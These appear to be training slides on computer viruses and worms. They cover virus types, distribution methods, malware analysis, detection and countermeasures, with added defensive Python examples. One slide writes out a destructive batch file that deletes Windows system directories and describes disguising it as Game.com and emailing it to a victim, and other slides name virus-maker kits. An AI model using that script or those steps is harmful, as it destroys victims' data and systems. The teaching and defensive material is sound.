Module 07 Viruses and Worms
Introduction to Viruses
• Computer viruses can wreak havoc on both business and personal
computers; worldwide, most businesses have been infected at some
point. A virus is a self-replicating program that spreads by
inserting copies of its own code into other executable code. It
runs without the knowledge or consent of the user. Like a
biological virus, a computer virus is contagious and can
contaminate other files; however, it can reach other machines
only with the help of a user who copies, sends or runs an
infected file.
Introduction to Worms
• A worm is a malicious program that can infect both local and
remote machines. Worms spread automatically, infecting system
after system across a network and on into other networks.
Because they do not depend on user action to execute, worms
have a greater potential for damage than viruses. There are
also malicious programs in the wild that combine the features
of several of these malware classes.
Stages of a Virus's Life
1. Design
2. Replication
3. Launch
4. Detection
5. Incorporation
6. Elimination
Working of Viruses
• The working of a virus is divided into two phases:
Infection Phase
Attack Phase
Infection Phase
• In the infection phase, the virus replicates itself and attaches
to an executable (.exe) file on the system. A program modified in
this way carries the virus's functionality: because the modified
program's code transfers control to the virus code, the virus runs
as soon as the infected program is executed.
• Some viruses infect new programs every time they are executed
(direct-action infectors). Others infect nothing when first run:
they stay resident in the computer's memory and infect programs
that are loaded later.
Attack Phase
• Once a virus has spread through the target system, it starts
corrupting the host's files and programs. Some viruses have a
trigger (a date, a counter or another event) that must fire
before the payload runs. Others carry no deliberate payload at
all; the damage then comes from bugs in their replication code
or from the resources consumed while spreading, such as deleted
files and slower sessions.
Why Do People Create Computer
Viruses?
• Inflict damage to competitors
• Research projects
• Pranks
• Vandalism
• Attack the products of specific companies
• Distribute political messages
• Financial gain etc…
Indications of Virus Attacks
• Programs take longer to load
• The hard drive is always full, even without installing any
programs
• The floppy disk drive or hard drive runs when it is not being used
• Unknown files keep appearing on the system
• The computer monitor displays strange graphics
• The hard drive becomes inaccessible when trying to boot from
the floppy drive
• The memory on the system seems to be in use and the system
slows down.
How Does a Computer Get Infected
by Viruses?
• When a user accepts and downloads files without properly checking
their source
• Attackers commonly send virus-infected files as email attachments to
spread the virus to the victim's system. If the victim opens the
attachment, the virus runs and infects the system.
• Attackers incorporate viruses in popular software programs and
upload the infected software on websites intended to download
software. When the victim downloads infected software and installs
it, the system gets infected.
• Failing to install new versions or the latest patches, which fix
known bugs, may expose your system to viruses.
• Etc…
Common Techniques Used to
Distribute Malware on the Web
• Blackhat Search Engine Optimization (SEO): Using this
technique the attacker ranks malware pages high in search
results
• Social Engineered Click-jacking: The attackers trick the users
into clicking on innocent-looking web pages that contain
malware
• Spearphishing Sites: This technique is used for mimicking
legitimate institutions, such as banks, in an attempt to steal
account login credentials.
Common Techniques Used to
Distribute Malware on the Web
• Malvertising: Embeds malware in ad networks that
display across hundreds of legitimate, high- traffic
sites
• Compromised Legitimate Websites: Host embedded
malware that spreads to unsuspecting visitors
• Drive-by Downloads: The attacker exploits flaws in
browser software to install malware just by visiting a
web page
Virus Hoaxes
• A virus hoax is simply a bluff. Viruses, by their nature,
have always created a horrifying impression. Hoaxes
are typically untrue scare alerts that unscrupulous
individuals send to create havoc. It is fairly common
for innocent users to pass these phony messages
along thinking they are helping others avoid the
"virus."
Virus Hoaxes
• Hoaxes are false alarms: reports about viruses that do not exist
• These warning messages propagate rapidly, typically stating that a
certain email message should not be opened because doing so would
damage one's system
• In some cases the warning messages themselves carry virus
attachments, which can do real damage to the systems that open them
Fake Antiviruses
• Fake antivirus (also called rogue antivirus or scareware) is a way
for attackers to compromise a system. It looks and behaves like a
real antivirus program, but it may tamper with the registry and
system files and give the attacker full control of and access to
the computer.
• Fake antivirus programs first appear as browser pop-ups warning the
user that the system has several security threats, backed up by
fabricated scan results. When the user tries to remove the
"viruses", they are taken to another page where they must buy or
subscribe to the product and enter payment details.
Types of Viruses
• This section highlights various types of viruses and worms, such
as file and multipartite viruses, macro viruses, cluster viruses,
stealth/tunneling viruses, encryption viruses, metamorphic
viruses, shell viruses, and so on. Computer viruses are malicious
programs written by attackers to enter a targeted system without
the user's permission; as a result they compromise the security
and the performance of the machine. A few of the most common types
are discussed in detail on the following slides.
System or Boot Sector Viruses
• The most common targets for a virus are the system sectors: the
Master Boot Record (MBR) and the DOS boot record. These are the
areas of the disk whose code is executed when the PC boots, and
every disk has a system sector of some sort. Boot sector viruses
infect the boot sectors of floppies and the boot records of the
hard disk. Examples: Disk Killer and Stoned.
File Viruses
• File viruses infect executable files: they insert their code into
the original file so that it runs whenever the file is executed.
File viruses are the largest group of viruses, but they are not
the most commonly encountered. They infect in a variety of ways
and target a large number of file types.
Multipartite Virus
• Multipartite viruses infect both program files and boot sectors:
an infected program infects the boot sector, and the boot sector
in turn infects programs. Examples: Invader, Flip and Tequila.
Macro Virus
• Microsoft Word and similar applications can be infected by a macro
virus: a virus written in the application's macro language that
automatically performs a sequence of actions when a document is
opened or another application event fires. Macro viruses are
sometimes regarded as less harmful than file infectors, but they
spread easily because documents are routinely exchanged, usually
by email.
Stealth/Tunneling Viruses
• These viruses try to hide from antivirus programs by hooking the
operating system's service-call interrupts while they are active.
Requests made through those interrupts (for example, reading an
infected file or sector) are intercepted by the virus code, which
returns falsified results: the stealth virus conceals the
modifications it made and presents the original, clean data
instead. In this way it takes over portions of the target system
and hides its own code.
Polymorphic Viruses
• Polymorphic viruses were developed to defeat antivirus scanners.
They are hard to trace because they change their appearance with
every infection, i.e., each copy differs from the previous one.
Typically the virus body is encrypted with a different key each
time, and only a small, varying decryptor is left in the clear.
Virus writers have even built mutation engines and virus-writing
toolkits that make the code of an existing virus look different
from every other copy of its kind.
Metamorphic Viruses
• Code that can rewrite itself is called metamorphic code. The virus
translates its code into a temporary intermediate form, transforms
it, and converts it back into normal code, so the original
algorithm stays intact while the instructions differ. The
technique defeats pattern recognition by antivirus software and
is more effective than polymorphism, because there is no constant
decrypted body left to scan for; the price is a large and complex
virus.
Overwriting File or Cavity Viruses
• Some program files contain regions of unused space (padding
between sections, for instance), and that empty space is the
target of these viruses. A cavity virus, also known as a
space-filler virus, stores its code in the unused space, so it
installs itself inside the file it infects without destroying the
original code or changing the file's size. A plain overwriting
virus, by contrast, replaces part of the host's code and so breaks
the host program.
Sparse Infector Viruses
• A sparse infector virus infects only occasionally (e.g.,
every tenth program executed) or only files whose
lengths fall within a narrow range.
File Extension Viruses
• File extension viruses rely on deceptive file extensions. A .TXT
file is safe, as it indicates a plain text file, but if your
computer's file-extension display is turned off (the Windows
default for known file types) and someone sends you a file named
BAD.TXT.VBS, you will see only BAD.TXT, while the file actually
runs as a Visual Basic Script.
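As an added example (not from the original slides), the following Python script checks attachment names for the trick just described: it reports the real extension, what the user would see with extensions hidden, and whether the name carries a document-looking double extension. It also flags the related right-to-left-override character trick, which goes slightly beyond the slide. The extension lists and the sample names are constructed assumptions, not a complete policy.

```python
# Added example (not from the original slides): flag file names that disguise an
# executable as a document, as BAD.TXT.VBS does when extensions are hidden.
# The extension lists below are illustrative assumptions, not an exhaustive policy.

RLO = "\u202e"  # Unicode RIGHT-TO-LEFT OVERRIDE: visually reverses the rest of a name

# Extensions Windows treats as executable content when the file is opened.
EXECUTABLE_EXTENSIONS = {
    "exe", "com", "bat", "cmd", "scr", "pif", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "ps1", "msi",
}
# Extensions a user reads as "just a document or a picture".
DOCUMENT_EXTENSIONS = {"txt", "doc", "docx", "xls", "xlsx", "pdf", "jpg", "jpeg", "png", "gif"}


def displayed_name(filename):
    """Approximate Explorer's 'Hide extensions for known file types' (the default):
    the last extension is dropped when it is a registered type, so BAD.TXT.VBS
    is shown as BAD.TXT."""
    if "." not in filename:
        return filename
    stem, ext = filename.rsplit(".", 1)
    known = EXECUTABLE_EXTENSIONS | DOCUMENT_EXTENSIONS
    return stem if ext.lower() in known else filename


def analyze_filename(filename):
    """Return the real extension, whether it executes, what the user would see
    with hidden extensions, and a list of deception findings (empty = nothing odd)."""
    parts = filename.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    findings = []
    if real_ext in EXECUTABLE_EXTENSIONS and len(parts) > 2 and parts[-2] in DOCUMENT_EXTENSIONS:
        findings.append(f"double extension: looks like .{parts[-2]} but runs as .{real_ext}")
    if RLO in filename:
        findings.append("right-to-left override character reverses the visible name")
    return {
        "real_extension": real_ext,
        "executable": real_ext in EXECUTABLE_EXTENSIONS,
        "shown_as": displayed_name(filename),
        "findings": findings,
    }


def scan_attachments(names):
    """Apply analyze_filename to a batch of attachment names; keep only suspicious ones."""
    return {n: r for n in names if (r := analyze_filename(n))["findings"]}


if __name__ == "__main__":
    # Constructed sample attachment names for the demonstration.
    samples = ["BAD.TXT.VBS", "report.pdf", "evil" + RLO + "gnp.scr"]
    for name, result in scan_attachments(samples).items():
        print(repr(name), "->", result)
```

In a mail gateway the same check belongs on the decoded attachment name, before the user ever sees the shortened display form.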
Writing a Simple Virus Program
• Create a batch file Game.bat with the following text (the cmd.exe
delete command is del; "delete" is not a valid command):

    @echo off
    del c:\winnt\system32\*.*
    del c:\winnt\*.*

• Convert the Game.bat batch file to Game.com using the bat2com
utility
• Assign an icon to Game.com using the Windows file-properties screen
• Send the Game.com file as an email attachment to a victim
• When the victim runs this program, it deletes core files in the
\WINNT directory, making Windows unusable. Strictly speaking this is
a destructive Trojan rather than a virus, since it does not
replicate; note also that files Windows has open are locked and
survive the deletion.
TeraBIT Virus Maker
• TeraBIT Virus Maker is a virus-construction tool. The viruses it
generates are detected by nearly all antivirus software when
scanned. They mostly do not harm the PC, but they can disable the
antivirus installed on the system for a short time.
JPS Virus Maker
• JPS Virus Maker is a tool for building viruses. It can also
convert a generated virus into a worm, and its output can be used
to disable normal hardware functions of the system.
Computer Worms
• Computer worms are malicious programs that
replicate, execute, and spread across network
connections independently, without human
interaction. Most worms are created only to replicate
and spread across a network, consuming available
computing resources; however, some worms carry a
payload to damage the host system.
How Is a Worm Different from a
Virus?
Virus
• A virus is a file that cannot spread to other computers unless an
infected file is replicated and actually sent to the other
computer, whereas a worm does just the opposite.
• Files such as .com, .exe or .sys, or a combination of them, are
corrupted once the virus runs on the system.
• Viruses are a lot harder to get off an infected machine.
Worm
• A worm, after being installed on a system, can replicate itself
and spread by using IRC, Outlook or other applicable mailing
programs.
• A worm typically does not modify any stored programs.
Internet Worm Maker Thing
• Internet Worm Maker Thing is a tool specifically designed for
generating worms. The generated Internet worms spread over
networks on their own: they compromise a host, establish a
foothold on it and use it as a base from which to launch further
attacks later. The worms work independently. An Internet worm
sends copies of itself to vulnerable computers across the
Internet.
Sheep Dip Computer
• Sheep dipping is the analysis of suspect files, incoming
messages, etc. for malware before they are allowed onto the
production network.
• The "sheep dip" computer is isolated from the other computers on
the network so that any virus it encounters cannot spread to them.
Before the procedure is carried out, the downloaded programs to be
checked are saved on external media such as CD-ROMs or floppy
diskettes and carried to the sheep-dip machine.
• A sheep-dip computer is equipped with port monitors, file
monitors, network monitors and antivirus software, and it connects
to a network only under strictly controlled conditions.
Antivirus Sensor Systems
• An antivirus sensor system combines antivirus, anti-spyware,
anti-Trojan, anti-spam and anti-phishing components, an email
scanner, and so on. It is usually placed between the internal
network and the Internet, where it lets only genuine traffic flow
through and blocks malicious traffic from entering. As a result
it contributes to the security of the network.
Malware Analysis Procedure
• Preparing the testbed:
– Install VMware or Virtual PC on the analysis system
– Install a guest OS in the virtual machine
– Isolate the guest from the network by setting its virtual NIC to
"host only" mode (or, better, to an internal virtual network with
no route to the host or the Internet, since host-only still lets
the guest reach the host's adapter)
– Disable shared folders and the guest-isolation conveniences
(drag-and-drop, copy/paste) between host and guest
– Copy the malware into the guest OS
Malware Analysis Procedure cont’d
• Step 1: Perform static analysis while the malware is not running
• Step 2: Collect information about:
– String values found in the binary, with the help of string
extraction tools such as BinText
– The packing and compression technique used, with the help of
compression and decompression tools such as UPX
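The following Python script is an added example, not part of the original slides nor of BinText or UPX, showing what Steps 1 and 2 produce: it pulls printable ASCII and UTF-16LE strings from a byte string the way `strings` or BinText do, applies a simple UPX-packer heuristic, and computes the hashes used to look a sample up. The sample bytes, the URL (on the reserved .invalid domain) and the list of suspicious API names are constructed for the demonstration.

```python
import hashlib
import re

# Constructed stand-in for a suspicious binary (not a real executable): a DOS
# header stub, UPX section names and tag, and strings a packed dropper might
# carry. The URL uses the reserved .invalid TLD.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"UPX0\x00\x00\x00\x00" + b"UPX1\x00\x00\x00\x00" + b"\x00" * 16
    + b"3.96\x00UPX!"
    + b"\x8b\x1e\x00\x01"
    + b"CreateRemoteThread\x00WriteProcessMemory\x00"
    + b"http://example.invalid/update.exe\x00\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le") + b"\x00\x00"
    + b"\x17\x02ab\x00"
)

# Imports whose presence in a binary warrants a closer look (illustrative list).
SUSPICIOUS_APIS = {"CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx",
                   "SetWindowsHookExA", "URLDownloadToFileA"}


def extract_strings(data, min_len=4):
    """What `strings`/BinText do: printable ASCII runs, plus UTF-16LE ("wide") runs,
    which Windows programs use for paths and registry keys."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


def detect_upx(data):
    """Cheap packer heuristic: UPX leaves its section names and a 'UPX!' tag in the
    file (unpack with `upx -d` before disassembling). Other packers need other markers."""
    return b"UPX!" in data or (b"UPX0" in data and b"UPX1" in data)


def file_hashes(data):
    """Hashes used to look the sample up in vendor databases and online scanners."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def triage(data):
    """Static-analysis summary of a byte string; nothing is executed."""
    strings = extract_strings(data)
    return {
        "hashes": file_hashes(data),
        "packed_with_upx": detect_upx(data),
        "suspicious_apis": sorted(s for s in strings if s in SUSPICIOUS_APIS),
        "urls": [s for s in strings if s.startswith(("http://", "https://"))],
        "autorun_keys": [s for s in strings if "CurrentVersion\\Run" in s],
        "string_count": len(strings),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

A packed sample yields few meaningful strings; the packer check tells you to unpack first and repeat the string extraction on the result.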
Malware Analysis Procedure cont’d
• Step 3: Set up the (isolated) network connection and confirm that
it is working without errors
• Step 4: Run the virus and monitor process actions and system
information with process-monitoring tools such as Process Monitor
and Process Explorer
Malware Analysis Procedure cont’d
• Step 5: Record network traffic with connection- and packet-logging
tools such as NetResident and TCPView
• Step 6: Determine the files added, processes spawned and registry
changes with snapshot-comparison tools such as RegShot (take one
snapshot before running the sample and one after, then compare)
Virus Analysis Tools
• IDA Pro: a disassembler and debugger that supports both Windows
and Linux platforms.
• OllyDbg: a Windows user-mode debugger used for analysing (and
cracking) applications.
Online Malware Testing
• http://anubis.iseclab.org
• http://onlinescan.avast.com
• https://www.microsoft.com
• http://www.threatexpert.com
• http://www.bitdefender.com
• http://www.gfi.com
• http://www.fortiguard.com
• Etc…
Virus Detection Methods
• The three main methods of virus detection are:
1. Scanning
2. Integrity checking
3. Interception
Scanning
• As soon as a virus is detected in the wild, antivirus vendors across
the globe start writing scanning signatures: byte strings that are
characteristic of that virus.
• Virus writers often create new viruses by altering an existing one;
what looks like a new virus may have taken only a few minutes to
produce. Attackers make such changes frequently to throw off the
scanners.
• The scanner writers identify and extract the signature strings from
the virus. The updated scanner then searches memory, files and
system sectors for those strings and declares the presence of the
virus once it finds a match. Only known, predefined viruses can be
detected this way.
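Added example (not from the original slides) covering this slide and the Polymorphic Viruses slide above: a signature scanner run against a constructed "virus body", a toy one-byte-XOR polymorphic engine that makes every copy look different, and the emulation step a scanner needs before the constant body becomes visible again. The virus body, the signature string and the "XYZ-Infector.A" name are assumptions made up for the demonstration; nothing here is real malware.

```python
import secrets

# Constructed stand-in for a virus body (not real malware): arbitrary bytes plus a
# constant marker of the kind a vendor would extract as the scanning signature.
VIRUS_BODY = (b"\xeb\x10XYZ-INFECTOR-v1\x00\x8b\x1e\x00\x01\xcd\x21"
              b"PAYLOAD:delete-files")
SIGNATURES = {"XYZ-Infector.A": b"XYZ-INFECTOR-v1"}   # hypothetical signature database


def signature_scan(data, signatures=SIGNATURES):
    """Scanner method: report every known signature string found in the data."""
    return sorted(name for name, sig in signatures.items() if sig in data)


def make_polymorphic_copy(body, key=None):
    """Toy polymorphic engine: a fresh one-byte XOR key per generation; the output
    is key || (body XOR key). A real engine also mutates the decryptor code; here
    the 'decryptor' is just the key byte, which already defeats the signature."""
    if key is None:
        key = secrets.randbelow(255) + 1      # 1..255: key 0 would leave the body in clear
    if not 1 <= key <= 255:
        raise ValueError("key must be in 1..255")
    return bytes([key]) + bytes(b ^ key for b in body)


def decrypt_polymorphic_copy(copy):
    """What the virus's decryptor does at run time, and what an emulating scanner
    must reproduce before the constant body can be matched."""
    key = copy[0]
    return bytes(b ^ key for b in copy[1:])


def infect(host, virus):
    """Appender-style infection used for the demo: virus bytes follow the host program."""
    return host + virus


def demo(key=0x5A):
    """Scan a clean host, a plainly infected host and a polymorphically infected host."""
    clean_host = b"MZ\x90\x00 ...original program bytes..."
    plain_infection = infect(clean_host, VIRUS_BODY)
    poly_infection = infect(clean_host, make_polymorphic_copy(VIRUS_BODY, key))
    return {
        "clean": signature_scan(clean_host),
        "plain_infection": signature_scan(plain_infection),
        "polymorphic_infection": signature_scan(poly_infection),
        # Emulation: run the decryptor over the appended copy, then scan the result.
        "polymorphic_after_emulation": signature_scan(
            decrypt_polymorphic_copy(poly_infection[len(clean_host):])),
    }


if __name__ == "__main__":
    for case, hits in demo().items():
        print(f"{case:30} -> {hits or 'no signature match'}")
```

The plain copy matches, the XOR-ed copy does not, and only after emulating the decryptor does the signature reappear; this is why modern scanners combine string matching with emulation and heuristics rather than relying on strings alone.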
Integrity Checking
• Integrity-checking products work by reading files and system
sectors and recording a checksum or hash of each, building a
signature or baseline for them.
• Because they detect any change rather than a known pattern,
integrity checkers catch unknown viruses that signature scanners
miss. They are also the most trustworthy way to assess how much
damage a virus has done, since the current data can be compared
against the originally established baseline.
• A disadvantage of a basic integrity checker is that it cannot
differentiate file corruption caused by a bug (or a legitimate
update) from corruption caused by a virus.
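Added example, not from the original slides nor from RegShot: a file-system integrity checker in Python that builds a hashed baseline, stores it, and reports what was added, removed or modified. This is also how Step 6 of the malware-analysis procedure (RegShot's before/after snapshots) works, applied here to files rather than the registry. The demo's directory tree and the changes it simulates are constructed; they show the method's strength (a size-preserving cavity change is caught) and its stated weakness (a legitimate edit is reported the same way as an infection).

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path):
    """SHA-256 of a file, read in chunks so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Baseline of a tree: relative path -> (size, sha256) for every regular file."""
    root = Path(root)
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): (p.stat().st_size, hash_file(p))
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def save_baseline(snap, path):
    """Persist the baseline; in practice keep it off the monitored machine (read-only media)."""
    Path(path).write_text(json.dumps(snap, indent=1))


def load_baseline(path):
    return {k: tuple(v) for k, v in json.loads(Path(path).read_text()).items()}


def compare(baseline, current):
    """RegShot-style diff of two snapshots. Everything that changed is reported,
    which is the method's strength (unknown viruses are caught) and its weakness
    (a legitimate edit is reported exactly like an infection)."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    # Content changed but size did not: the signature of a cavity (space-filler) infector.
    same_size_modified = [p for p in modified if baseline[p][0] == current[p][0]]
    return {"added": added, "removed": removed, "modified": modified,
            "same_size_modified": same_size_modified}


def demo():
    """Build a small tree, snapshot it, simulate activity (constructed), snapshot again."""
    with tempfile.TemporaryDirectory() as d, tempfile.TemporaryDirectory() as store:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "calc.exe").write_bytes(b"MZ" + b"\x00" * 30)
        (root / "bin" / "notepad.exe").write_bytes(b"MZ" + b"\x00" * 30)
        (root / "readme.txt").write_text("hello")
        save_baseline(snapshot(root), Path(store) / "baseline.json")   # kept outside the tree

        # Simulated activity between the two snapshots (constructed for the demo):
        (root / "bin" / "notepad.exe").write_bytes(b"MZ" + b"\x00" * 30 + b"VIRUS")  # appender
        (root / "bin" / "calc.exe").write_bytes(b"MZ" + b"\x00" * 28 + b"VI")        # cavity: same size
        (root / "readme.txt").write_text("hello world")                               # legitimate edit
        (root / "bin" / "dropped.dll").write_bytes(b"MZ")                             # new file

        return compare(load_baseline(Path(store) / "baseline.json"), snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:20} {paths}")
```

readme.txt shows up in "modified" next to the two infected executables: the checker cannot tell them apart, so in practice the report is reviewed against known change windows (patches, installs) before anything is declared malicious.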
Interceptor
• Interceptors (behaviour blockers) are mainly used to deflect logic
bombs and Trojans.
• An interceptor monitors requests to the operating system for
network access or for actions that threaten programs or data. When
it sees such a request, it generally pops up and asks the user
whether to allow it to continue. There is no dependable way,
however, to intercept a virus that branches directly to low-level
code or issues input/output instructions directly, bypassing the
operating system.
Countermeasures
• Install antivirus software that detects and removes infections as
they appear
• Write an antivirus policy for safe computing and distribute it to
the staff
• Pay attention to warnings and instructions when downloading files
or programs from the Internet
• Keep the antivirus software and its signatures up to date
(automatically, or at least daily), so that it can identify and
clean out new malware
• Avoid opening attachments received from unknown senders, as viruses
spread via email attachments
• Do not accept disks or programs without first checking them with a
current version of an antivirus program
Countermeasures cont’d
• Ensure that executable code sent to the organization is approved
before it is run
• Run disk clean-up, a registry scanner and defragmentation once a
week
• Do not boot the machine from an infected bootable system disk
• Turn on the built-in firewall if the OS is Windows XP or later
• Keep informed about the latest virus threats
• Run anti-spyware/adware scans once a week
• Be cautious with files sent through instant messengers
Antivirus Tools
• ESET Smart Security 5 available at http://www.eset.com
• AVG Antivirus available at http://free.avg.com
• BitDefender available at http://www.bitdefender.com
• Kaspersky Anti-Virus available at http://www.kaspersky.com
• Norton Anti-Virus available at http://www.symantec.com
• F-Secure Anti-Virus available at http://www.f-secure.com
• Avast Pro Antivirus available at http://www.avast.com
• McAfee Anti-Virus Plus 2013 available at http://
home.mcafee.com
Penetration Testing
• Step 1: Install an antivirus program
• Step 2: Update the antivirus software
• Step 3: Scan the system for viruses
• Step 4: Set the antivirus to quarantine or delete the virus
• Step 5: Go to safe mode and delete the infected file manually
• Step 6: Scan the system for running processes
Penetration Testing cont’d
• Step 7: Scan the system for suspicious registry entries
• Step 8: Scan the system for Windows services
• Step 9: Scan the system for startup programs
• Step 10: Scan the system for file and folder integrity
• Step 12: Document all findings
• Step 13: Isolate the infected system
• Step 14: Sanitize the complete infected system